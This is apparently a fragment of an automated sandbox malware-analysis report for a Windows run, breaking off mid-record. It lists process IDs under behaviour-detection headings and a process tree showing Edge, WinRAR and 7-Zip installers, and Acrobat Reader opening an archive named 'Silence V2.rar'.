pid	Process
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe

Suspicious use of SetWindowsHookEx 34 IoCs

pid	Process
3460	winrar-x64-701.exe
3460	winrar-x64-701.exe
4000	7z2409-x64.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
4372	OpenWith.exe
3704	AcroRd32.exe
3704	AcroRd32.exe
3704	AcroRd32.exe
3704	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4988 wrote to memory of 3652	4988	msedge.exe	93
PID 4988 wrote to memory of 3652	4988	msedge.exe	93
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 964	4988	msedge.exe	94
PID 4988 wrote to memory of 2624	4988	msedge.exe	95
PID 4988 wrote to memory of 2624	4988	msedge.exe	95
PID 4988 wrote to memory of 1960	4988	msedge.exe	96
PID 4988 wrote to memory of 1960	4988	msedge.exe	96
PID 4988 wrote to memory of 1960	4988	msedge.exe	96
PID 4988 wrote to memory of 1960	4988	msedge.exe	96
PID 4988 wrote to memory of 1960	4988	msedge.exe	96
PID 4988 wrote to memory of 1960	4988	msedge.exe	96
PID 4988 wrote to memory of 1960	4988	msedge.exe	96
PID 4988 wrote to memory of 1960	4988	msedge.exe	96
PID 4988 wrote to memory of 1960	4988	msedge.exe	96
PID 4988 wrote to memory of 1960	4988	msedge.exe	96
PID 4988 wrote to memory of 1960	4988	msedge.exe	96
PID 4988 wrote to memory of 1960	4988	msedge.exe	96
PID 4988 wrote to memory of 1960	4988	msedge.exe	96
PID 4988 wrote to memory of 1960	4988	msedge.exe	96
PID 4988 wrote to memory of 1960	4988	msedge.exe	96
PID 4988 wrote to memory of 1960	4988	msedge.exe	96
PID 4988 wrote to memory of 1960	4988	msedge.exe	96
PID 4988 wrote to memory of 1960	4988	msedge.exe	96
PID 4988 wrote to memory of 1960	4988	msedge.exe	96
PID 4988 wrote to memory of 1960	4988	msedge.exe	96

C:\Users\Admin\AppData\Local\Temp\winrar-x64-701.exe
"C:\Users\Admin\AppData\Local\Temp\winrar-x64-701.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:3460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd330746f8,0x7ffd33074708,0x7ffd33074718
  2⤵
  PID:3652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2
  2⤵
  PID:964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
  2⤵
  PID:1960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
  2⤵
  PID:4448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
  2⤵
  PID:1572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1
  2⤵
  PID:3860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4168 /prefetch:1
  2⤵
  PID:808
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3708 /prefetch:8
  2⤵
  PID:3324
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3708 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:1
  2⤵
  PID:3964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4384 /prefetch:1
  2⤵
  PID:3196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5428 /prefetch:8
  2⤵
  PID:2076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
  2⤵
  PID:1552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4320 /prefetch:1
  2⤵
  PID:4632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:1
  2⤵
  PID:1672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:1
  2⤵
  PID:4052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
  2⤵
  PID:3196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
  2⤵
  PID:912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
  2⤵
  PID:2324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1
  2⤵
  PID:5028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
  2⤵
  PID:2816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4164 /prefetch:1
  2⤵
  PID:5064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
  2⤵
  PID:3476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
  2⤵
  PID:2820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1
  2⤵
  PID:392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1
  2⤵
  PID:4800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6220 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6356 /prefetch:1
  2⤵
  PID:4824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:1
  2⤵
  PID:4212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4376 /prefetch:1
  2⤵
  PID:1512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1820 /prefetch:1
  2⤵
  PID:3520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6528 /prefetch:1
  2⤵
  PID:776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
  2⤵
  PID:452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
  2⤵
  PID:836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5652 /prefetch:8
  2⤵
  PID:4380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4180 /prefetch:1
  2⤵
  PID:4472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1928,5205242990557444497,2395911355071637013,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6508 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1204
- C:\Users\Admin\Downloads\7z2409-x64.exe
  "C:\Users\Admin\Downloads\7z2409-x64.exe"
  2⤵
  - Drops file in Program Files directory
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:3848

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1692

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4864

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\bb8eedd365f448c2aa69f99a1fbeb9fc /t 4688 /p 3460
1⤵
PID:1672

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2904

C:\Users\Admin\Downloads\7z2409-x64.exe
"C:\Users\Admin\Downloads\7z2409-x64.exe"
1⤵
- Drops file in Program Files directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4000

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4372
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Desktop\Silence V2.rar"
  2⤵
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:3704
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4832
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9DEAF81F32A54EAFCE054E7805E06E9E --mojo-platform-channel-handle=1760 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:3968
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=096601E93B8EF5DEEB50F6EC533C2119 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context 